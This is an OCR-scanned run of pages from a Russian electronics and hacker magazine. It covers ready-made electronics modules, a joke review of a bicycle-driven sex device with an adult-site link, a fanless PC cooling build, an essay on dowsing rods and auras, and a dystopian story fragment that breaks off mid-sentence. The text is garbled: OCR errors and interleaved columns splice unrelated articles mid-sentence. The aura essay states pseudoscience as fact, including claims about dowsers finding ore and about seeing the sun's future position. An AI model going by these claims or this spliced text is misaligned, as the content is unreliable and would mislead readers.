ются, слюни текут, руки трясутся - в 
таком состоянии деньги теряют вся- 
кий смысл! Вокруг на меня смотрят 
мультиметры, цифровые осциллог- 
рады, вентиляторы, книги, электрон- 
ные конструкторы, паяльные стан- 
ции и другие полезные вещи! А кор- 
пуса - просто прелесть, еще Дмитрий 
из «почтового ящика» говорил, что 
устройство без корпуса - всегда не- 
доделано! Сделал девайс - упакуй 
его в корпус, вообще начинать луч- 
ше с корпуса, иначе твое творение 
превратится в обычный радиохлам и 
осядет в пыльном углу. Так вот, тут 
невероятный выбор корпусов! А эти 
кассы для радиоэлементов... 

Ладно, я увлекся. К чему это я? 
Этот супермаркет отражает идеи 
современной радиоэлектроники: все 
собирается из готовых блоков. Мно- 
гие прутся от сборки компов. Поку- 
паешь мать, процессор, видюху, па- 
мять, вентилятор, корпус, и можно 
работать. Процесс сборки современ- 
ного радиоэлектронного устройства 
сильно похож. Причем часто можно 
даже обойтись без пайки. Чем ге- 
морроиться со средневековыми схе- 
мами на транзисторах, уж лучше ку- 
пить готовую микросхему или блок. 
Сейчас наступает такое время, ког- 
да действительно выгоднее взять 
готовое. Объясняю: чтобы настро- 
ить что-то на транзисторах, тебе 
нужно дофига времени, нужна 90- 
рогая аппаратура: осциллограф, 
мультиметр, частотомер, испыта- 
тельный генератор. Причем вряд ли 
ты где-то еще сможешь использо- 
вать уже паянные транзюки. Другое 
дело ПЛМ (программируемая логи- 
ческая матрица) или микропроцес- 
сор, их ты можешь GO опупения пе- 
решивать на компьютере и приме- 
нять в новых и новых схемах, встав- 
ляя в панель на сухой пайке. 


прикол: Рецензия 

на устройство «Dildo Вже» 

Тут наш постоянный паяльный ав- 
тор Электрический Утюг 
(e-tug@mail.ru) прислал ссылку на 
очень интересный механизм. Назы- 


Педальная самоходная система 
автоудовлетворения «Dildo Bike» 


вается Dildo Bike или веловибратор 
(фаллосипед) по-нашему. То есть 
вибратор совмещен с велосипедом, 
и девушка может не только доехать 
из пункта «А» в пункт «Б», но и ис- 
пытать при этом несколько оргаз- 
мов подряд. Фотки с испытаний ве- 
ловибратора выложены на сайте 
http://www.jizz-city.com/tgp/ 
dildo-bike/indexfr6piw.html. Запре- 
щается посещать этот ресурс, если 
тебе нет 18 лет или твои религиоз- 
ные убеждения противоречат хард- 
корному содержанию. 

Давай посмотрим на приличную 
фотографию этого устройства (go 
испытаний). Схема достаточно слож- 
на, сразу видно, что делал ее сумас- 
шедший механик (не электронщик). 
Взят обычный спортивный велик с 
большим количеством скоростей - 
из-за того, что с педалями связано 
несколько шестеренок. Через одну 
из шестеренок перекинута дополни- 
тельная цепь, в результате возника- 
ют ограничения по переключению 
скоростей. Рядом с сиденьем закреп- 
лена дополнительная шестеренка, 


но не на оси, а на металлическом 
квадрате без подшипников. Это зна- 
чит, что она будет двигаться со скри- 
пом, а цепь привода вибратора бу- 
дет постоянно слетать. Обычный си- 
ликоновый вибратор из секс-шопа 
закрепляется в металлической тру- 
бе, которая двигается по направляю- 
щей, приваренной к раме. В сиденье 
проделано отверстие, а чтобы вибра- 
тор проходил свободно, в это отве- 
рстие вставлена пластиковая трубка, 
а уже в нее вибратор. В результате 
можно сделать вывод, что вибратор 
движется в сиденье с большим нап- 
рягом, заедает, это может привести к 
падению с велосипеда и травмам ве- 
лосипедистки. Представь, что во 
время движения у тебя заедают пе- 
дали. При этом на сиденье из-за 
пластиковой трубки весьма неком- 
ффортно сидеть. Вибратор приводит- 
ся в движение через шатун, соеди- 
няющий шестерню и крепеж вибра- 
тора. Есть подозрение, что шатун за- 
девает за ногу наездницы. 

Вывод: веловибратор этой 
конструкции - очень стремное уст- 
ройство. Применять его могут толь- 
ко тренированные порнозвезды. 
Сесть на такой велосипед не так-то 
просто, возможно даже необходи- 
ма помощь ассистента! Поскольку 
как только начинается вращение 
педалей, вибратор начинает дви- 
гаться. Но самое главное - при от- 
казе или заедании какой-либо час- 
ти механизма неизбежно нанесе- 
ние тяжелой физической травмы 
велосипедистке. Самостоятельно 
такое устройство собрать практи- 
чески невозможно. 

Далее Электрический Утюг (е- 
tug@mail.ru) рассказывает о том, как 
бы делал веловибратор электрон- 
щик (человек, далекий от сумасшед- 
шей механики). Электронщик купит 
сертифицированное безопасное 
dildo с интегрированным электромо- 
торчиком. Вся механика в таком виб- 
раторе создана на заводе специа- 
листами и не причинит вреда девуш- 
ке при отказе. На велосипед уста- 
навливается динамка (электрогене- 
ратор с приводом от колеса). При 
конструкции не обязательно закреп- 
лять dildo на сиденье, можно даже 
ездить на велосипеде в одежде. 
Вибратор можно использовать не 
только вагинальный, но и анально- 
вагинальный. При этом еще и вело- 
сипедный фонарик работать будет, 
что даст возможность для вечерних 
и ночных веловибропрогулок. 

Поскольку динамка вырабатывает 
большую мощность при большей 
скорости, вибратор будет работать 
энергичнее на высоких скоростях 
(так же, как и в механической моде- 
ли). Однако здесь мы без труда мо- 
жем включить схему регулирова- 
ния зависимости удовольствия от 
скорости. Ведь в цепь питания 
электровибратора от динамки мож- 
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«Черный холод» 


но включить реостат. У всех про- 
мышленных dildo такой реостат уже 
имеется! Ведь для девушки очень 
важна возможность подбора инди- 
видуальной частоты движения ис- 
кусственного перца. Hy а если ge- 
вушка любит острые ощущения и 
ей не хватает мощности, можно д0- 
бавить еще одну динамку! 
Девушка, пилотирующая механи- 
ческий веловибратор, вынуждена 
разъезжать голышом, что сильно 


частотой, пониженной go 866MHz. 

ZALMAN CNPS3100-GP отличается 
большой площадью поверхности. С 
одной стороны, это хорошо, чем 
больше площадь поверхности, тем 
лучше. Но, с другой стороны, не 
нужно забывать о трении, которое 
задерживает воздух в частых плас- 
тинах радиатора. Чтобы справиться 
с этим трением, к ZALMAN 
CNPS3100-GP прилагается огром- 
ный вентилятор. 


Для пассив- 
сужает область применения уст- Поскольку я хотел безвентиля- ного охлаж- 
ройства. Наездница электрического — торный комп, то пришлось приме- ВЕ 
дилдобайка может кататься в одеж- нить два правила: Е 
де, не привлекая к себе дополни- 1) как можно больше металла; радиатор! 
тельного внимания ничем, кроме 2) как можно меньше трения о 
громких стонов. Таким образом, воздух. 
электродилдовелосипед можно Я уже рассказывал, что был не- 
применять как в компании, так и давно в моем любимом радиомага- 
для одиночных вибропоездок, какв  зине. Так вот, там я купил огром- 
черте города, так и за городом. ный танковый радиатор с толстыми 
Вряд ли кто-нибудь догадается. редкими пластинами и мощной ста- 

Итак, в результате применения ниной. Для пассивного охлаждения 
электроники мы сделали устрой- надо покупать специальный радиа- 
ство более дешевым, более прос- тор! Кулер, сконструированный под 
тым в сборке, гораздо более безо- вентилятор, не катит из-за плотно- 
пасным и безотказным, более неза- го расположения пластин, в кото- 
метным и более функциональным! рых застаивается воздух. 

у Новая система охлаждения про- 
решение: БЕСШУМНЫЙ КОМП Ш —цессора «Злобное тепло» дает 65 
В прошлом номере я уже рассказы- градусов при максимальной нагруз- 
вал тебе про то, как собирал бес- ке в летнюю жару. А теплыми лет- 
шумный компьютер. Напомню, что ними ночами у меня на процессоре 
к радиаторам блока питания я всего 48-50 градусов Цельсия. Зна- 
прикрутил струбцинами массивные чит, зимою будет 42-45 градусов. 
куски металла (система охлажде- Радиатор «Черный холоду» я пос- 
ния «Армагеддон»). Это позволило — тавил на термопасту, он достаточно 
отказаться от вентилятора на бло- плотно прилегает к CPU за счет 
ке питания. На процессор я поста- своего веса. А чтобы он спучайно 
вил медный радиатор от ZALMAN не свалился, я привязал его прово- 
CNPS3100-GP. Так вот, испытание лочкой к сокету. = 
жарким летом показало, что ZAL- Е 
МАМ справляется плохо: греется 
go 77 градусов Цельсия при боль- бой 
шой нагрузке на процессоре Intel сям за sro 
Pentium 11 1.3GHz (Tualatin) с +B мо лия ave 
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ЭЛЕКТРИЧЕСКАЯ АУРА! 


Началось все еще в школе, с повального увлечения биоэнергетикой! Мы сидели на 
перемене в вестибюле и угадывали, какого цвета трусики у одноклассниц. В этом деле 
удалось здорово продвинуться, как только я купил биорамку у старого 


биолокационного инженера, который стоял тогда в Москве на Лубянке рядом с Музеем 


Маяковского. 


сожалению, у седого, 
умудренного опытом 
биолокатора не было 
домашнего телефона. Жил он где- 
то в металлургическом военном 
институте в секретной лаборато- 
рии. Там как раз было достаточно 
материала для его биолокационных 
рамок. Он сделал достаточно инте- 
ресную форму рамки из толстой 
алюминиевой проволоки, позже по- 
явились модели из меди. Приятно 
было то, что специальным грузиком 
можно было настроить рамочку под 
свое биополе. Стальные биорамки с 
деревянной ручкой из мистических 
магазинов типа: «Путь к себе» или 
«Магический Кристалл» на метре 
Белорусской не катили. Они были 
непомерно дорогими, плохо крути- 
лись, плохо ощущались и естест- 
венно безбожно врали. Ну что еще 
взять от промышленного ширпот- 
реба? Однако рамочки, изготовлен- 
ные седым биолокатором, изготов- 
ленные его собственными руками, 
пропитанные его энергетикой, с 
применением самых последних во- 
енных технологий в области мате- 
риаловедения шли просто на ура! 
Работать с рамкой не так-то прос- 
то. Прежде всего, надо соблюдать 
биоэнергетическую гигиену, то есть 


никому нельзя давать свою рамоч- 
ку. Иначе она будет врать. Если с 
рамкой какие-то нелады, нужно 
провести по ней рукою, чтобы по- 
лучше зарядить своей энергией. 
Кстати, такая операция аналогична 
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кнопке “RESET” на компе. Чтобы 
получить четкий вопрос на ответ, 
нужно четко его задать. Но ни в ко- 
ем случае нельзя жульничать, 
нельзя быть заинтересованным, 
иначе рамка будет показывать 
только тот вариант, который тебе 
более предпочтителен. Наоборот, 
надо отстраниться, убедить себя 
что тебе все равно какого цвет тру- 
сишки у одноклассницы. Только 
тогда можно рассчитывать на бо- 
лее точный ответ. Нужно знать о 
чем спрашивать рамку, например 
нельзя ее сравнивать о будущем, 
потому что будущее не предопре- 
делено. Рамка может ответить тебе 
только на факты, ну или предска- 
зать события с какой-то вероят- 
ностью на основе известных фак- 
тов. Но рамке не ведомо будущее, 
для нее его просто нет. На самом 
деле не пытаться предсказать бу- 
дущее учат многие профессиональ- 
ные медиумы, поскольку может по- 
явиться астральная сущность 
«дух», который будет обманывать 
человека жаждущего предсказа- 
ний, а взамен пить его жизненную 
энергию! Словом, будущее можно 
только прогнозировать с какой-то 
долей вероятности, но не предска- 
зывать! 


Итак, как же использовать био- 
рамку? Нужно взять биорамку в ру- 
ки, если она новая или кто-то ее ла- 
пал, то нужно очистить ее под стру- 
ей холодной воды, или в другой 
проточной воде, в ручье например. 
После очистки по ней нужно пово- 
дить руками, чтобы пропитать при- 
бор своей энергетикой! После этого 
нужно расслабиться, прогнать все 
дурные мысли, почувствовать себя 
стороннем наблюдателем и присту- 
пать к делу. Настроить рамку прос- 
то - нужно мысленно (а можно и 
вслух) спросить: «Где Да», «Где 
Нет». Допустим, что в одном случае 
прибор отклониться налево, ав 
другом случае направо. Нужно те- 
реть рамку руками и подстраивать 


регулятор до тех пор, пока она не 
начнет отвечать на вопросы адек- 
ватно. То есть все время одинако- 
во. После этого можно задавать 
вопросы: 

-У нее красные трусики? 

-Нет. 

-У нее черные трусики? 

-Нет. 

-А может зеленые? 

-Нет. 

-Белые? 

-Да. 

-Ну вот, почему все ходят в ба- 
нальных белых трусищах? 

-А они кружевные? 

Так гадать, конечно, очень долго, 
поэтому мы стали рисовать диаг- 
раммы. Это такой кружочек, разде- 
ленный на нужное количество час- 
тей, в каждом таком сегменте запи- 
сан определенный цвет. Ставишь 
рамку в центр и мысленно концент- 
рируешься на вопросе: «Какого же 
они цвета? ». Ну и она должна по- 
вернуться в нужную сторону. На 
диаграмме можно написать ответы 
на многие другие вопросы и кру- 
тить рамку. 

Одновременно с этим мы стали 
учиться разглядывать ауру. Аура, 
это такая цветная дымка вокруг те- 
ла человека, по которой можно оп- 
ределить его характер, настроение, 
умения, здоровье. Например, когда 
люди снарчиваются или накидыва- 
ются в готовальню, их аура стано- 
виться грязной, тонкой и рваной. 
Хорошо, когда цвета ауры яркие, 
чистые, а очертания плавные! 


Так вот еще седой биолокатор 
умел определять толщину и форму 
ауры не видимой неподготовлен- 
ным глазом с помощью биорамки. 
Для этого он подходил вплотную к 
человеку, рамка смотрела на него, 
а потом начинал смешно пятиться 
назад. Как только аура заканчива- 
лась рамочка опадала (сворачива- 
ла вбок), то есть теряла связь. 
Кстати, диаграмма для определения 
цвета трусов отлично подходит для 
определения цвета ауры. Разве что 
белой и черной ауры не бывает. 
Каждый цвет по-своему толкуется, 
например розовые оттенки в ауре 
говорят о влюбленности. 

Если потренироваться, то можно 
научиться видеть ауру глазами. 
Для этого нужно смотреть не на са- 
мого человека, а за него, смотреть 
за горизонт. Тогда сначала вокруг 
человека появляется бесцветная 
дымка, а если долго приглядывать- 
ся, то она становится цветной. Наи- 
более частые цвета - голубой, зеле- 
ный, красный. RGB - одним словом. 

Можно конечно не верить, но 
факты говорят сами за себя. Лозо- 
ходцами в Европе было разведано 
более 80-ти процентов запасов ме- 
таллической руды и воды. Лозоход- 
цы использовали в качестве био- 
рамки лозу. Лозой могла служить 
веточка орешника. Средневековый 
биолокатор входил в транс, вращая 
веточку обеими руками. Как только 
он подходил к залежам руды, то 
его руки сами начинали вращать 
веточку быстрее. 

Ученые объясняют такое явление 
возможностями человеческого 
мозга. Ведь наш мозг мог опреде- 


лить залежи руды или цвет труси- 
ков подружки по каким-то косвен- 
ным признакам. Но поскольку тут 
нет логики, осознать это невозмож- 
но. Биорамка или лоза позволяет 
осознать результаты подсозна- 
тельной работы мозга. 

Похожих вещей можно добиться и 
без рамки. Например, бывалые 
грибники определяют наличие гри- 
бов подсознательно! Они просто 
чувствуют, что здесь должны быть 
грибы, даже если приметы говорят 
об обратном. Или бывают люби, ко- 


торые чувствуют, где водятся день- 
ги, даже если все обстоятельства и 
логика говорят об обратном! 


В одном из номеров Хакера я 
опубликовал электронную лозу, она 
состояла из генератора и триггера. 
При нажатии на кнопку работал ге- 
нератор, а при отпускании фиксиро- 
валось состояние. Человеческий 
мозг подсознательно может зажечь 
и потушить лампочку, и такое уст- 
ройство действительно работало. 

В любом мистическом магазине 
можно сфотографировать свою ау- 
ру. Это устройство устроено весьма 
наглядно. Цифровая камера, элект- 
роды на которые нужно положить 
руки и струйный принтер с фотопе- 
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PORTS/levich_subst.interpret/lev 
ich_subst.interpret.htm 

Опыты козырева с графиками и 
формулами, схемы установок. 


7) http://www.kirlian.org/aura.htm 
Описание компьютерного аппа- 
рата для фотографирования ау- 
ры. Такие стоят в мистических 
ларьках :-). 

8) http://sy.boom.ru/5.htm 
Фотографии ауры Moros, в том 
числе и русских :-). 

9) http://irene.malevanov.ru/con- 
tent/OldBooks/Henkin/page10.htm 
О цветах ауры. 


10) http://www.loopback.ru/ 
psytech/energy/thirdeye.htm 
Несколько способов научиться 
видеть ауру. 

11) http://ktp1984.chat.ru/home- 
page/abilities/17lozoho.html 
Школа лозоходства. 
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чатью. Совершенно ясно, что такое 
устройство пропускает через тело 
человека электрические токи, а 
процессор преобразует это в цвет 
и накладывает на фото. Чем-то по- 
хоже на электрокардиографию. 
Можно даже купить такой девайс и 
получать фотки ауры на компьюте- 
ре. Однако бывают случаи, когда 
свечение вокруг головы медиума 
удается запечатлеть без всяких 
технических ухищрений. 
Интересные опыты проводили 
ученые супруги Кирлианы, они бра- 
ли обыкновенный кленовый листо- 
чек и клали его на строчник от те- 
левизора. Получалась высокочас- 
тотная фотография. Потом от лис- 
точка отрывали кусок и снова дела- 
ли фотографию, оказывалось, что 
тело листа разрушено, а аура оста- 
лась. Даже ножка листка могла 
воспроизвести весь клиновый лист 
на высокочастотном фотоснимке! 
Интересное направление, наблю- 
дается сейчас в создании ТераГер- 
цовых камер. Сенсоры, чувствитель- 
ные к ТераГерцовым волнам спо- 
собны видеть сквозь стены и любые 
преграды. Оказывается, все предме- 
ты излучают Теравысокочастотные 
волны, и если настроиться на нуж- 
ную частоту, можно это увидеть. 
Например, настроившись на частоту 
тела можно видеть его под одеждой. 
На что это похоже? На биолокацию. 
Еще очень интересные опыты 
провел Козырев. Ему удалось уло- 
вить изменение энтропии. Напри- 
мер, он направлял телескоп со спе- 
циальным датчиком на место где 
должно быть солнце в будущем и 
фиксировал отклонение прибора, 
направлял на предыдущее положе- 
ние солнца и также фиксировал 
его наличие. То есть он мог видеть 
положение солнца в настоящем, в 
будущем и прошлом. Не влияние 
ли это ауры солнца на человека? 
Наконец-то мы подходим к тому, 
когда приборы начинают фиксиро- 
вать то, что считалось волшебством. 
Доверяй влиянию ауры звезд, если 
конечно астролог не шарлатан, а 
имеет математическое образование 
и все правильно рассчитал! 


ИИ 
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В одном из 
номеров Ха- 
кера я опуб- 

ликовал 
электронную 
лозу, она 
состояла из 
генератора и 
триггера. 
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роневик глухо урчал, под- 
питывая своим генерато- 
ром мощь приемопередат- 
чика. Двадцать два рядовых отряда специ- 
ального назначения, выстроившись в ше- 
ренгу по одиннадцать друг напротив друга, 
образовали ровный коридор, по которому, 
размахивая зеленой веткой, подобранной 
неподалеку, шагал капрал Гамильтон. 
- Приказ остается в силе! - громко известил 
он спецназовцев. - Нам поставлена задача 
очистить три квартала резервации Лос-Ала- 
моса. Исходя из данных, полученных раз- 
ведкой, там становится все больше и боль- 
ше людей, пытающихся отказаться от Воз- 
действия, что по законам нашей страны яв- 
ляется преступлением перед ее народом. 
Отказавшийся от Воздействия - враг. Помни- 
те это четко, когда будете поднимать стволы 
своих автоматов выше колен. Вы - элита. 
Персонально для вас создано индивидуаль- 
ное Воздействие на каждого, вся мощь Им- 
перии питает ваши мозги. Правая шеренга - 
по одному к броневику, шагом марш! 
Они подходили четким строевым шагом, 
брали свисающие с борта броневика прово- 
да сих личными номерами и подключали 
их к разъемам на правом запястье. А когда 
через пять минут у каждого из них появлял- 
ся блеск в глазах, они по команде вынима- 
ли штекеры, отдавали честь капралу и возв- 
ращались назад. 
Гамильтон смотрел на них влюбленными 
глазами. Это была его гордость, лучшие 
бойцы спецназа. Каждый день, в восемнад- 
цать ноль-ноль, они проходили эту проце- 
дуру - и оставались непобедимыми. За пос- 
ледние три месяца капрал потерял лишь 
двоих снайперов, которых рассекретили и 
растерзали десятка два идиотов из резерва- 
ции... Гамильтон вспоминал их смерть go 
сих пор. 
ТРЕТЬИМ В ЛЕВОЙ ШЕРЕНГЕ СТОЯЛ РЯДОВОЙ 
АЛЕКС ЛОКРИДЖ. КАПРАЛ ГАМИЛЬТОН ЗА- 
ПОМНИТ ЕГО НАДОЛГО... 


Жжх 


Мир казался розовым. Это было единствен- 
ное приятное ощущение, которое приходи- 
лось испытывать в течение последних трех 
дней. 

Крис понял, что ранение достаточно тяже- 
лое, когда к исходу второго дня в животе 
появились нестерпимые режущие боли. По- 
догнув колени, он медленно гладил живот 
вблизи раны и представлял, как там, внутри 
него, вокруг сплющенной пули сейчас пле- 
тется клубок гноя и крови. Иногда из ссади- 
ны на лбу в глаза затекала струйка крови, 
но у Криса не хватало сил стереть ее, и вот 
тогда мир становился розовым. А потом 
приходила жена, смывала с лица засохшую 
кровь, давала какую-то таблетку, и Крис за- 
сыпал... Ему снилось беззаботное детство, 


me 
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школа, друзья и подруги, вся жизнь в ра- 
дужном кружении проносилась перед ним 
за те короткие мгновения без боли, что да- 
рила ему Мария при помощи маленькой 
таблетки солормина, который был в их квар- 
тале крайне дефицитным наркотиком. 
Потом он просыпался и просил дать ему но- 
утбук. Умную машину, усадив Криса так, что- 
бы он не кричал от боли, ставили с ним ря- 
дом на стол, он опускал пальцы на клавиши 
и забывал о дырке в животе. Случайно кто- 
то в разговоре обронил страшное слово 
«перитонит»... Крис, конечно же, знал, что 
это такое. Он знал, что ему осталось нес- 
колько дней в сознании и еще столько же 
без сознания (на эти дни он особенно не 
рассчитывал, ибо пользы от них не было ни- 
какой). Главное, что проблема оказалась 
решаемой - и он так не вовремя получил эту 
пулю в живоТт.. 

Страшно было быть изгоем в собственной 
стране. Но еще страшнее умереть им. Поэто- 
му, подсев за два дня на солормин, он соз- 
нательно шел на то, чтобы не обращаться к 
врачу - у него не было времени на лечение, 
да и вышло бы оно ему боком. Не хотелось 
бы оказаться в федеральной тюрьме после 
того, как его ноутбук будет просмотрен опе- 
ративным сотрудником Управления инфор- 
мации - а это бы случилось в обязательном 
порядке; ведь Крис Осборн был объявлен в 
розыск уже полгода назад, и явись он куда- 
нибудь дальше городского кладбища - си- 
деть ему два пожизненных срока на окраи- 
не Лос-Аламоса в одиночной камере, вспо- 
миная, как тюремный хирург вытащил из 
живота пулю... Жизнь в обмен на свободу. 
Крис давно уже решил, что этого не будет. 
Итак, у него есть два дня (он очень верил в 
это, верил в наркотик, который не только 
обезболит его, но и подстегнет воображе- 
ние, работоспособность). До решения зада- 
чи оставалось не так уж много - в исчисле- 
нии программиста. Всего-то несколько стра- 
ниц кода. Несколько страниц. Потом отлад- 
ка - но на нее уже может не хватить 300- 
ровья. Надо сделать как можно меньше 
ошибок, как можно меньше... 

Крис размял пальцы, легонько кашлянул 
(боль прострелила весь живот, заставив 
сморщиться на пару секунд). Экран ноутбу- 
ка засветился приятным голубоватым све- 
том. За спиной раздался всхлип, задавлен- 
ный ладонью. 

Крис аккуратно, чтобы не потревожить рану, 
оглянулся. У двери, опершись всем телом 
на косяк, плакала жена, прикрывая ла- 
донью рот. Крис протянул руку; она сделала 
шаг вперед, дала ему таблетку. Солормин 
был быстро проглочен, Крис откинулся на 
спинку кресла. Мария подошла ближе, вста- 
ла за спиной, провела рукой по волосам; 
Крис благодарно кивнул. Надо было рабо- 
тать. 


Но прежде чем начать, он воруг вспомнил 
того парня, что выстрелил в него пару дней 
назад. Спецназовца, проводившего зачист- 
ку в квартале восемь-А. Он просто поднял 
автомат и дал очередь на звук; они практи- 
чески никогда так не стреляли во время 
плановых акций, так как знали, что никако- 
го сопротивления им оказываться не будет. 
Для них подобные зачистки были чем-то 
вроде развлечений и тренировок одновре- 
менно, они отрабатывали на них различные 
приемы боевых построений, стрельбы, вер- 
толеты бомбили по площадям, механики-во- 
дители танков вспоминали забытые уроки 
вождения. И только в последнее время они 
стали стрелять на любой шорох, пользо- 
ваться гранатами объемного взрыва и по- 
сылать вперед танки. Крис помнит, почему 
это случилось... 

Он тогда успешно применил бета-версию 
своего детища. Впервые в жизни один из 
них стал свободен. И он сумел взять в руки 
оружие. Когда в спецназе был убит первый 
пехотинец - это стало для них трагедией 
вселенского масштаба. Никто и никогда не 
поднимал на них руку, они не боялись вхо- 
дить в чужие дома, расчеркивая лазерными 
прицелами шторы и ковры; они не страши- 
лись мрака, пронзая его подствольными 
фонарями и трассирующими пулями. 

Но вот однажды капрал, выбив ногой дверь, 
вошел внутрь дома, в котором жила одна из 
семей, помеченная на ликвидацию, - ив 
грудь ему рванулась автоматная очередь. 
Тело капрала, пронзенное не одним десят- 
ком пуль, вылетело обратно в распахнутую 
дверь и распласталось на крыльце, у ног 
подчиненных спецназовцев. Трое солдат с 
видеокамерами на левом глазу молча смот- 
рели на убитого командира и транслирова- 
ли картинку в Штаб объединенного коман- 
дования. Пауза, затянувшаяся на пару ми- 
HYT, положила конец тотальному уничтоже- 
нию людей в Лос-Аламосе, да и по всей 
стране. 

Конечно же, они потом вошли в тот GoM и 
выжгли его внутренности дотла. Конечно 
же, тот парень погиб вместе со своей семь- 
ей. Но он был первым... 

С тех пор ОНИ стали бояться. И Крис по не- 
осторожности получил от них ту самую пу- 
лю страха, выпущенную на слух. 

Все знали, что он скоро умрет. Но все надея- 
лись, что он сделает свою работу вовремя. 
И каждый вечер, втыкая провода в личные 
разъемы на правом запястье, они мечтали, 
что скоро это закончится... 


жжх 


Это был уже третий квартал, который они 
зачищали за последние двое суток. Уста- 
лость рвалась наружу; напряженные нервы 
не хотели мириться с происходящим. Звук 
стрельбы перестал быть слышен уже много 


часов назад - при нажатии на курки уши от- 
мечали только слабое уханье, барабанные 
перепонки отказывались доносить GO мозгов 
грохот выстрелов. Две трети солдат страдали 
от конъюнктивита - пороховые газы и дым по- 
жаров разъедал глаза. Шнайдер и Горовиц 
давно отстали, капрал не обращал на это вни- 
мания - у них, он знал, всегда были проблемы 
со стандартной обувью, мозоли были их би- 
чом на протяжении последних нескольких 
месяцев (с наступлением сезона дождей да- 
же вполне здоровые ребята начинали му- 
чаться - сапоги превращали кожу ног непо- 
НЯТНО ВО ЧТО). 

Справа от Локриджа качнуло стену - он ощутил 
это по волне воздуха, толкнувшей его в щеку. 
Там, в комнате с проваленным уже потолком, 
кто-то из его сослуживцев кинул гранату. Еще 
пара сволочей отправилась на тот свет... 
Капрал зычно крикнул: 

- Не останавливаться, Локридж! Продолжать 
движение по периметру! 

Алекс покорно кивнул головой на ходу (с кас- 
ки аккуратной полуокружностью сорвалась 
вода) и снова стал считать шаги - негромко, 
лишь бы в шуме боя слышать свой голос. 

- Пятьсот семнадцать, пятьсот восемнадцать... 
Очередь. Внезапная, длинная. Так их не учи- 
ли. Значит... 

Локридж прибавил шагу и выскочил на отк- 
рытое место - угол дома был разрушен, а ма- 
газин напротив снесен до основания. В цент- 
ре развалин стоял человек в рваном плаще; 
держа в руках автомат, он с ненавистью раз- 
ряжал его в тело солдата, лежащего у ног. 
Палец свело на курке; очередь постепенно 
задирала ствол в сторону. Умирающий уже 
перестал дергаться, однако пули изредка еще 
попадали в него, отчего тело будто бы вмина- 
лось в бетонное крошево. Скоро человек не 
мог уже бороться с оружием; он бросил 
цевье, продолжая нажимать на курок, и дико 
закричал в поливающее его дождем небо. 
Автомат, став наполовину свободным, запля- 
сал в его правой руке, разметав около десят- 
ка пуль вокруг. 

Локридж машинально пригнулся, после чего 
заученно поднял приклад к плечу, обхватил 
автомат мокрой ладонью, прицелился и точ- 
ным выстрелом заставил человека на разва- 
линах выронить оружие и упасть поверх тела 
своей жертвы. 

Наклонив подбородок к груди, Алекс прове- 
рил крепления ларингофонов. 

- На отметке «семь-одиннадцать» потери, - 
произнес он одними губами, зная, что прижа- 
тые к горлу контакты усилят движения голо- 
совых связок. - Враг уничтожен. 

- Перемещаться по периметру go «семь-во- 
семнадцать», - услышал он в наушнике ответ 
лейтенанта, сидящего сейчас где-то в броне- 
вике сопровождения. - Погибшего подберут, 
оставь там фальшфейер. 

- Слушаюсь. Продолжаю движение до «семь- 
восемнадцать». 

Локридж оглянулся по сторонам, перебежал 
дорогу и остановился рядом с телами. На 
спецназовце не было живого места - вся спи- 
на была изорвана пулями в клочья, и броне- 
жилет не помог; он вцепился руками в бетон, 
запустив пальцы в щели разрушенных плит. 
Умирая, он так и не понял, какая из пуль ока- 
залась для него последней... Алекс вытащил 
из-за пояса продолговатый футляр фальш- 


фейера, сдернул с него крышку - фитиль 
вспыхнул на пару секунд ярким желтым ог- 
нем, потом обрел густую розовую окраску; 
повалил красный дым. Сорвав с лежащего 
рядом убийцы плащ, Локридж накрыл им те- 
ло товарища, поставил факел рядом, обло- 
жив его камнями. 

- Дождь не сможет погасить его, - шепнул он 
мертвецу. Больше всего он боялся, что когда 
зачистка закончится и они встанут напротив 
командирского броневика в шеренгу по двое 
- место перед ним будет пустовать; а это зна- 
чит, что он только что воткнул факел на моги- 
ле рядового Милтона, своего единственного 
друга. 

За спиной раздалось шлепанье по лужам. 
Локридж быстро схватил автомат с камней, 
упал вбок и перекатился на несколько мет- 
ров. 

- Локридж, это мы! - раздался крик оттуда, 
где сейчас розовато дымил факел. - Шнайдер 
и Горовиц! 

Лежа в довольно глубокой луже и понимая, 
как у него намокают трусы, Алекс с трудом 
удержался от того, чтобы не пустить очередь 
в сторону этих идиотов. Опершись на приклад, 
он встал на одно колено. 

- Какого хрена?! - крикнул он в ответ. - Вы 
должны быть совсем в другом месте! Ваши 
отметки по карте... 

- Знаем, Локридж, - перебил его Горовиц, ма- 
ленький тщедушный солдатик, которого в 
спецназе держали из-за его феноменальной 
меткости. - Но есть проблема. 

Тем временем Локридж уже встал во весь 
рост, смахнул с брюк, набрякших OT вобы, на- 
липшую грязь, и оглянулся по сторонам. 
Прихрамывая, Шнайдер и Горовиц подошли к 
нему и встали так, чтобы как можно больше 
сузить сектор обстрела при возможном напа- 
дении. 

- Вы что, мать вашу! - отшатнулся от них 
Алекс, сделав пару шагов в сторону и успоко- 
ившись только тогда, когда понял, что сможет 
прострелить любую точку развалин магазина 
и прилегающий к нему перекресток. - Выпол- 
няйте задачу! 

Горовиц тяжело дышал и все время переми- 
нался с ноги на ногу, давая по очереди отдох- 
нуть своим натертым пяткам. Шнайдер груст- 
но посмотрел на него, потом перевел взгляд 
на Локриджа и спросил: 

- Ты ведь у нас самый идейный - так скажи, 
что мы здесь делаем? 

Локридж невольно сильнее сжал автомат. Он 
не ожидал такого вопроса. 

- Что это значит? - зло спросил он у сослу- 
живцев. - Какого хрена возникают подобные 
речи? Да еще посреди боя? 

Шнайдер сделал успокаивающий жест и мол- 
ча указал на мембраны ларингофонов. Лок- 
ридж усмехнулся: 

- Чего боишься? 

- Лейтенанта Рэя, - тихо сказал Горовиц. 
Алекс не удивился. 

- Я хочу напомнить вам, что вы, как и я, в 
настоящий момент выполняете приказ - будь- 
те так любезны, милорды из навозной кучи, 
вначале выполните его, а потом подавайте 
рапорт вышестоящему начальству... 

- Ты не понял, Локриодж, - перебил Шнайдер, 
который даже забыл, что у него болят ноги. - 
Вопрос не в том, нравится или не нравится 
нам приказ. Черт с ним, он на совести тех, кто 
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прислал нас сюда. Но ответь нам, как перед 
Богом, - что мы ищем? 

И вот тут Локридж задумался. Задумался, 
судя по всему, впервые с тех пор, как взял 
в руки оружие и пошел громить кварталы, 
наполненные бунтовщиками. Переводя 
взгляд со Шнайдера на Горовца и обратно, 
он нервно постукивал пальцами по автома- 
ту; через минуту тягостного молчания он за- 
кинул автомат за спину, что было уж сов- 
сем безрассудно - зная, что вокруг враги... 
Когда Локридж взмахнул автоматом, чтобы 
накинуть ремень на плечо, Шнайдер испу- 
ганно отшатнулся в сторону; Алексу это по- 
